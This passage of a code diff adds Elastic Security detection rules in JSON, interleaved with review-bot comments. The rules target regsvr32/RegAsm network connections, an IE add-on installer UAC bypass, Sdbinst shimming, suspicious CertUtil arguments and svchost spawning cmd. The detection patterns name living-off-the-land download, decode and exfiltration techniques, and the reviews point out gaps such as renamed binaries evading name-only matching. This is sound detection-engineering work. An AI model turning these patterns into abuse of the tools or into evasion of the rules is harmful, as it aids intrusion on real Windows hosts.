Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not (\n (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.parent.name : \"msiexec.exe\" or process.parent.executable : (\"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Program Files\\\\*.exe\"))\n )\n ]\n [network where host.os.type == \"windows\" and process.name : (\"regsvr32.exe\", \"RegAsm.exe\", \"RegSvcs.exe\") and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\") and network.protocol != \"dns\"]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fb02b8d3-71ee-4af1-bacd-215d23f17efa", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.009", + "name": "Regsvcs/Regasm", + "reference": "https://attack.mitre.org/techniques/T1218/009/" + }, + { + "id": "T1218.010", + "name": "Regsvr32", + "reference": "https://attack.mitre.org/techniques/T1218/010/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "fb02b8d3-71ee-4af1-bacd-215d23f17efa_107", + "type": "security-rule" +} \ No newline at end of file 
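Review bot: The `description` string names `regsvr64.exe` as a monitored binary, but the `query` in this hunk matches only `process.name : ("regsvr32.exe", "RegAsm.exe", "RegSvcs.exe")` in both sequence stages, and the investigation guide in `note` lists the same three, so the description should be brought in line with the query rather than telling analysts a fourth binary is covered. Both stages also key solely on `process.name`, whereas the Suspicious CertUtil Commands rule added in this same commit (fd70c98a-c410-42dc-a2e3-761c71848acf_108) pairs the name check with `?process.pe.original_file_name`; a renamed copy of the binary would pass this rule but not that pattern, and the same name-only match is in the Sdbinst rule files fd4a992d-6130-4802-9ff8-829b89ae801f_109 and _110. A form such as `(process.name : "regsvr32.exe" or ?process.pe.original_file_name : "regsvr32.exe")` per binary would close that gap, with the exact OriginalFilename values confirmed against reference binaries and the corresponding `required_fields` entry added. These JSON files look generated from the upstream rule sources, so the fix belongs there rather than in this package.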
diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_108.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_108.json new file mode 100644 index 00000000000..410f7dce623 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_108.json 
@@ -0,0 +1,147 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"C:\\\\*\\\\AppData\\\\*\\\\Temp\\\\IDC*.tmp\\\\*.exe\" and\n process.parent.name : \"ieinstal.exe\" and process.parent.args : \"-Embedding\"\n\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", + "references": [ + "https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will 
need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + 
"type": "eql", + "version": 108 + }, + "id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_109.json b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_109.json new file mode 100644 index 00000000000..3ca66af4803 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fc7c0fa4-8f03-4b3e-8336-c5feab0be022_109.json 
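Review bot: The `query` string ships two commented-out fragments, `/* uncomment once in winlogbeat */` and a disabled `and not (process.code_signature.subject_name == "Microsoft Corporation" and process.code_signature.trusted == true)` clause, with no tracking reference, so the rule's intended signed-binary exclusion is dead text delivered to every installation of this package. The identical strings are in the fc7c0fa4-8f03-4b3e-8336-c5feab0be022_109 file added below, which differs only in its `logs-endpoint.events.process-*` index pattern. The `?field` optional-field syntax used elsewhere in this commit (`?process.pe.original_file_name` in the CertUtil rule) appears to be the mechanism for referencing fields that some of the listed indices lack, so the comment should either be resolved that way or removed with the decision recorded upstream; if the clause is enabled, `required_fields` needs the two `process.code_signature.*` entries, and the trade-off that a Microsoft-signed, trusted payload under `ieinstal.exe -Embedding` would then no longer alert is worth stating in the rule's `note`.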
@@ -0,0 +1,147 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM Interface to launch a malicious program. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Elevated COM Internet Explorer Add-On Installer", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"C:\\\\*\\\\AppData\\\\*\\\\Temp\\\\IDC*.tmp\\\\*.exe\" and\n process.parent.name : \"ieinstal.exe\" and process.parent.args : \"-Embedding\"\n\n /* uncomment once in winlogbeat */\n /* and not (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) */\n", + "references": [ + "https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users 
will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", 
+ "type": "eql", + "version": 109 + }, + "id": "fc7c0fa4-8f03-4b3e-8336-c5feab0be022_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_109.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_109.json new file mode 100644 index 00000000000..aa266b08ad0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_109.json 
@@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Application Shimming via Sdbinst", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"sdbinst.exe\" and\n not (process.args : \"-m\" and process.args : \"-bg\") and\n not process.args : \"-mm\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + 
"Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "fd4a992d-6130-4802-9ff8-829b89ae801f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_110.json b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_110.json new file mode 100644 index 00000000000..de28ea83a3c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd4a992d-6130-4802-9ff8-829b89ae801f_110.json 
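Review bot: The `tags` array lists only `Data Source: Elastic Endgame` and `Data Source: Elastic Defend`, while `index` includes `logs-windows.*` and `logs-system.security*` and `related_integrations` declares the `windows` and `system` packages; the Network Connection via Registration Utility rule in this same commit tags `Data Source: Sysmon` for its `logs-windows.sysmon_operational-*` index, so this rule's tags undercount its sources. The same gap is in fd4a992d-6130-4802-9ff8-829b89ae801f_110 and in the CertUtil rule fd70c98a-c410-42dc-a2e3-761c71848acf_108 below, both of which carry the same index list. If the tags drive filtering in the rule-management UI, analysts filtering by Sysmon or Windows event-log sources will not find these rules; adding at least `"Data Source: Sysmon"` (the tag string already used in this commit) and whatever tag the project uses for Windows Security event logs would fix that, in the upstream rule source if these files are generated.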
@@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Application Shim was created to allow for backward compatibility of software as the operating system codebase changes over time. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Application Shimming via Sdbinst", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"sdbinst.exe\" and\n process.args : \"?*\" and\n not (process.args : \"-m\" and process.args : \"-bg\") and\n not process.args : \"-mm\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fd4a992d-6130-4802-9ff8-829b89ae801f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + 
"Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.011", + "name": "Application Shimming", + "reference": "https://attack.mitre.org/techniques/T1546/011/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "fd4a992d-6130-4802-9ff8-829b89ae801f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_108.json b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_108.json new file mode 100644 index 00000000000..4f2fd74caaa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd70c98a-c410-42dc-a2e3-761c71848acf_108.json 
@@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies suspicious commands being used with certutil.exe. CertUtil is a native Windows component which is part of Certificate Services. CertUtil is often abused by attackers to live off the land for stealthier command and control or data exfiltration.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious CertUtil Commands", + "note": "## Triage and analysis\n\n### Investigating Suspicious CertUtil Commands\n\n`certutil.exe` is a command line utility program that is included with Microsoft Windows operating systems. It is used to manage and manipulate digital certificates and certificate services on computers running Windows.\n\nAttackers can abuse `certutil.exe` utility to download and/or deobfuscate malware, offensive security tools, and certificates from external sources to take the next steps in a compromised environment. This rule identifies command line arguments used to accomplish these behaviors.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine the nature of the execution.\n - If files were downloaded, retrieve them and check whether they were run, and under which security context.\n - If files were obfuscated or deobfuscated, retrieve them.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved files using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"certutil.exe\" or ?process.pe.original_file_name == \"CertUtil.exe\") and\n process.args : (\"?decode\", \"?encode\", \"?urlcache\", \"?verifyctl\", \"?encodehex\", \"?decodehex\", \"?exportPFX\")\n", + "references": [ + "https://twitter.com/Moriarty_Meng/status/984380793383370752", + "https://twitter.com/egre55/status/1087685529016193025", + "https://www.sysadmins.lv/blog-en/certutil-tips-and-tricks-working-with-x509-file-format.aspx", + "https://docs.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fd70c98a-c410-42dc-a2e3-761c71848acf", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "fd70c98a-c410-42dc-a2e3-761c71848acf_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_210.json b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_210.json new file mode 100644 index 00000000000..3b84d9e7b5c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fd7a6052-58fa-4397-93c3-4795249ccfa2_210.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious parent child process relationship with cmd.exe descending from svchost.exe", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Svchost spawning Cmd", + "new_terms_fields": [ + "host.id", + "process.command_line", + "user.id" + ], + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows NT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be used by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual behavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege escalation.\n\n> 